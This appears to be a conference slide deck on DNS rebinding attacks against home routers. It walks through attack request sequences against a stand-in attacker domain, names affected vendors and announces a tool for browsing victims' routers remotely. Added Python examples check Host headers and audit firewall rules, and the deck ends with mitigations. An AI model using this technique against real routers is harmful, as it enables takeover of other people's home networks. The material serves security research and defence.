How to Hack Millions of Routers
Craig Heffner, Seismic LLC
SOHO Router…Security?
Common Attack Techniques
Cross Site Request Forgery
No trust relationship between browser and router
Can’t forge Basic Authentication credentials
Anti-CSRF
Limited by the same origin policy
DNS Rebinding
Rebinding prevention by OpenDNS / NoScript / DNSWall
Most rebinding attacks no longer work
Most…
Multiple A Record Attack
Better known as DNS load balancing / redundancy
Return multiple IP addresses in DNS response
Browser attempts to connect to each IP address in order
If one IP goes down, browser switches to the next IP in the list
Limited attack
Can rebind to any public IP address
Can’t rebind to RFC 1918 IP addresses
Rebinding to a Public IP
Target IP: 2.3.5.8
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
Diagram sequence between 1.4.1.4 and 2.3.5.8, messages in slide order:
1. What is the IP address for attacker.com?
2. 1.4.1.4, 2.3.5.8
3. GET / HTTP/1.1 (Host: attacker.com)
4. <script>…</script>
5. GET / HTTP/1.1 (Host: attacker.com)
6. TCP RST
7. GET / HTTP/1.1 (Host: attacker.com)
8. <html>…</html>
Rebinding to a Private IP
Target IP: 192.168.1.1
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
Diagram sequence between 1.4.1.4 and 192.168.1.1, messages in slide order:
1. What is the IP address for attacker.com?
2. 1.4.1.4, 192.168.1.1
3. GET / HTTP/1.1 (Host: attacker.com)
4. <html>…</html>
Services Bound to All Interfaces
# netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:53 *:* LISTEN
tcp 0 0 *:22 *:* LISTEN
tcp 0 0 *:23 *:* LISTEN
Firewall Rules Based on Interface Names
-A INPUT -i eth0 -j DROP
-A INPUT -j ACCEPT
IP Stack Implementations
RFC 1122 defines two IP models:
Strong End System Model
Weak End System Model
The Weak End System Model
RFC 1122, Weak End System Model:
A host MAY silently discard an incoming datagram whose
destination address does not correspond to the physical
interface through which it is received.
A host MAY restrict itself to sending (non-source-routed) IP
datagrams only through the physical interface that corresponds
to the IP source address of the datagrams.
Weak End System Model
Diagram: eth1 192.168.1.1, eth0 2.3.5.8
TCP SYN Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
TCP SYN/ACK Packet
Source IP: 2.3.5.8
Destination IP: 192.168.1.100
Source Port: 80
TCP ACK Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
Traffic Capture
End Result
Public IP Rebinding Attack
Target IP: 2.3.5.8
Attacker IP: 1.4.1.4
Attacker Domain: attacker.com
Diagram sequence between 1.4.1.4 and 2.3.5.8, messages in slide order:
1. What is the IP address for attacker.com?
2. 1.4.1.4, 2.3.5.8
3. GET / HTTP/1.1 (Host: attacker.com)
4. <script>...</script>
5. GET / HTTP/1.1 (Host: attacker.com)
6. TCP RST
7. GET / HTTP/1.1 (Host: attacker.com)
8. <html>…</html>
Public IP Rebinding Attack
Pros:
Nearly instant rebind, no delay or waiting period
Don’t need to know router’s internal IP
Works in all major browsers: IE, FF, Opera, Safari, Chrome
Cons:
Router must meet very specific conditions
Must bind Web server to the WAN interface
Firewall rules must be based on interface names, not IP addresses
Must implement the weak end system model
Not all routers are vulnerable
Affected Routers
Asus
Belkin
Dell
Thomson
Linksys
Third Party Firmware
ActionTec
Making the Attack Practical
To make the attack practical:
Must obtain target’s public IP address automatically
Must coordinate services (DNS, Web, Firewall)
Must do something useful
Tool Release: Rebind
Provides all necessary services
DNS, Web, Firewall
Serves up JavaScript code
Limits foreground activity
Makes use of cross-domain XHR, if supported
Supports all major Web browsers
Attacker can browse target routers in real-time
Via a standard HTTP proxy
Rebind
Target IP: 2.3.5.8
Rebind IP: 1.4.1.4
Attacker Domain: attacker.com
Diagram sequence between 2.3.5.8 and 1.4.1.4, messages in slide order:
1. What is the IP address for attacker.com?
2. 1.4.1.4
3. GET /init HTTP/1.1 (Host: attacker.com)
4. Location: http://wacme.attacker.com/exec
5. What is the IP address for wacme.attacker.com?
6. 1.4.1.4, 2.3.5.8
7. GET /exec HTTP/1.1 (Host: wacme.attacker.com)
8. <script>…</script>
9. GET / HTTP/1.1 (Host: wacme.attacker.com)
10. TCP RST
11. GET / HTTP/1.1 (Host: wacme.attacker.com)
12. <html>…</html>
13. GET /poll HTTP/1.1 (Host: attacker.com:81)
14. GET http://2.3.5.8/ HTTP/1.1
15. GET /poll HTTP/1.1 (Host: attacker.com:81)
16. GET / HTTP/1.1
17. GET / HTTP/1.1 (Host: wacme.attacker.com)
18. <html>…</html>
19. POST /exec HTTP/1.1 (Host: attacker.com:81), body: <html>…</html>
20. <html>…</html>
Demo
More Fun With Rebind
Attacking SOAP services
UPnP
HNAP
We can rebind to any public IP
Proxy attacks to other Web sites via your browser
As long as the site doesn’t check the host header
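
Every request in the slide sequences above reaches the router carrying a Host header that names attacker.com, so a Web interface that checks the header can refuse them. The following is an added example, not part of the original slides; `router.lan` and the function names are hypothetical, and the sample requests are constructed from the slides.

```python
import re

# Names the admin interface legitimately answers to. 192.168.1.1 is the
# router's LAN address from the slides; "router.lan" is a hypothetical name.
ALLOWED_HOSTS = frozenset({"192.168.1.1", "router.lan"})

# host or [ipv6-literal], optionally followed by :port
_HOST = re.compile(r"(?:\[([0-9A-Fa-f:.]+)\]|([A-Za-z0-9.-]+))(?::\d{1,5})?")


def normalize_host(value):
    """Lower-case host from a Host header value, without port or trailing dot.

    Returns None when the value is not a plain host[:port].
    """
    m = _HOST.fullmatch(value.strip())
    if not m:
        return None
    host = (m.group(1) or m.group(2)).lower().rstrip(".")
    return host or None


def check_request(raw, allowed=ALLOWED_HOSTS):
    """Status the router UI should answer with: 200, 400 or 403."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    hosts = [
        line.split(":", 1)[1]
        for line in lines[1:]
        if ":" in line and line.split(":", 1)[0].strip().lower() == "host"
    ]
    if len(hosts) != 1:
        return 400  # missing or repeated Host header
    host = normalize_host(hosts[0])
    if host is None:
        return 400  # malformed value
    return 200 if host in allowed else 403


# Constructed sample requests, modelled on the ones shown in the slides.
SAMPLES = {
    "rebound": b"GET / HTTP/1.1\r\nHost: attacker.com\r\n\r\n",
    "rebound_subdomain": b"GET / HTTP/1.1\r\nHost: wacme.attacker.com\r\n\r\n",
    "lan_admin": b"GET / HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n",
    "lan_admin_by_name": b"GET / HTTP/1.1\r\nHost: Router.LAN.:80\r\n\r\n",
    "no_host": b"GET / HTTP/1.1\r\n\r\n",
}


def demo():
    """Map each sample name to the status check_request() returns."""
    return {name: check_request(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name:18} -> {status}")
```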
DNS Rebinding Countermeasures
Am I Vulnerable?
End-User Mitigations
Break any of the attack’s conditions
Interface binding
Firewall rules
Routing rules
Disable the HTTP administrative interface
Reduce the impact of the attack
Basic security precautions
Blocking Attacks at the Router
Don’t bind services to the external interface
May not have sufficient access to the router to change this
Some services don’t give you a choice
Re-configure firewall rules
-A INPUT -i eth1 -d 172.69.0.0/16 -j DROP
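
The router conditions listed under Public IP Rebinding Attack (service bound to all interfaces, firewall rules keyed on interface name, weak end system model) and the effect of a LAN-side drop rule like the one above can be checked mechanically. This is an added example, not part of the original slides or of the Rebind tool; it uses the deck's sample addresses, assumes eth0 is the WAN side and eth1 the LAN side, and `audit`, `verdict` and the fixed rule set are constructed for illustration.

```python
import ipaddress
import shlex
from dataclasses import dataclass
from typing import Optional

# Constructed samples built from the slides: eth0 = WAN (2.3.5.8), eth1 = LAN.
NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:53 *:* LISTEN
tcp 0 0 *:22 *:* LISTEN
tcp 0 0 *:23 *:* LISTEN
"""
RULES_VULNERABLE = """\
-A INPUT -i eth0 -j DROP
-A INPUT -j ACCEPT
"""
# Same rules with a LAN-side drop for the WAN address placed first
# (constructed, following the pattern of the slide's eth1 rule).
RULES_FIXED = "-A INPUT -i eth1 -d 2.3.5.8 -j DROP\n" + RULES_VULNERABLE


@dataclass
class Rule:
    in_iface: Optional[str]                   # -i
    dst: Optional[ipaddress.IPv4Network]      # -d
    target: str                               # -j


def parse_rules(text):
    """Parse '-A INPUT' lines; only -i, -d and -j are understood.

    Anything else raises, so the audit never guesses at a rule's meaning.
    """
    rules = []
    for line in text.splitlines():
        tok = shlex.split(line.strip())
        if len(tok) < 2 or tok[:2] != ["-A", "INPUT"]:
            continue
        opts = dict(zip(tok[2::2], tok[3::2]))
        if len(tok) % 2 or set(opts) - {"-i", "-d", "-j"} or "-j" not in opts:
            raise ValueError(f"unsupported rule: {line!r}")
        dst = ipaddress.ip_network(opts["-d"], strict=False) if "-d" in opts else None
        rules.append(Rule(opts.get("-i"), dst, opts["-j"]))
    return rules


def verdict(rules, in_iface, dst_ip, policy="ACCEPT"):
    """First-match verdict for a packet arriving on in_iface for dst_ip."""
    ip = ipaddress.ip_address(dst_ip)
    for r in rules:
        if r.in_iface not in (None, in_iface):
            continue
        if r.dst is not None and ip not in r.dst:
            continue
        if r.target in ("ACCEPT", "DROP", "REJECT"):
            return r.target
    return policy


def wildcard_listeners(netstat_text):
    """Numeric TCP ports listening on all interfaces ('*' or 0.0.0.0)."""
    ports = set()
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0] == "tcp" and f[-1] == "LISTEN":
            addr, _, port = f[3].rpartition(":")
            if addr in ("*", "0.0.0.0") and port.isdigit():
                ports.add(int(port))
    return ports


def audit(netstat_text, rules_text, lan_iface, wan_ip, port=80, weak_end_system=True):
    """Report each condition from the slides; exposed only if all three hold.

    weak_end_system cannot be read from these inputs, so it is a parameter.
    """
    findings = {
        "bound_to_all_interfaces": port in wildcard_listeners(netstat_text),
        "lan_to_wan_ip_accepted":
            verdict(parse_rules(rules_text), lan_iface, wan_ip) == "ACCEPT",
        "weak_end_system": weak_end_system,
    }
    findings["exposed"] = all(findings.values())
    return findings


if __name__ == "__main__":
    for name, rules in (("vulnerable", RULES_VULNERABLE), ("fixed", RULES_FIXED)):
        print(name, audit(NETSTAT, rules, "eth1", "2.3.5.8"))
```

With the fixed rule set, LAN clients still reach the admin interface at 192.168.1.1; only LAN-side traffic addressed to the WAN IP is dropped.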
HTTP Administrative Interface
Disable the HTTP interface
Use HTTPS / SSH
Disable UPnP while you’re at it
But be warned…
Enabling HTTPS won’t disable HTTP
In some routers you can’t disable HTTP
Some routers have HTTP listening on alternate ports
In some routers you can’t disable HNAP
Blocking Attacks at the Host
Re-configure firewall rules
-A INPUT -d 172.69.0.0/16 -j DROP
Configure dummy routes
route add -net 172.69.0.0/16 gw 127.0.0.1
Basic Security Precautions
Change your router’s default password
Keep your firmware up to date
Don’t trust untrusted content
Vendor / Industry Solutions
Fix the same-origin policy in browsers
Implement the strong end system model in routers
Build DNS rebinding mitigations into routers
Conclusion
DNS rebinding still poses a threat to your LAN
Tools are available to exploit DNS rebinding
Only you can prevent forest fires
References
Java Security: From HotJava to Netscape and Beyond
http://www.cs.princeton.edu/sip/pub/oakland-paper-96.pdf
Protecting Browsers From DNS Rebinding Attacks
http://crypto.stanford.edu/dns/dns-rebinding.pdf
Design Reviewing the Web
http://www.youtube.com/watch?v=cBF1zp8vR9M
Intranet Invasion Through Anti-DNS Pinning
https://www.blackhat.com/presentations/bh-usa-07/Byrne/Presentation/bh-usa-07-byrne.pdf
Anti-DNS Pinning Demo
http://www.jumperz.net/index.php?i=2&a=3&b=3
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy
RFC 1122
http://www.faqs.org/rfcs/rfc1122.html
Loopback and Multi-Homed Routing Flaw
http://seclists.org/bugtraq/2001/Mar/42
TCP/IP Illustrated Volume 2, W. Richard Stevens
pp. 218–219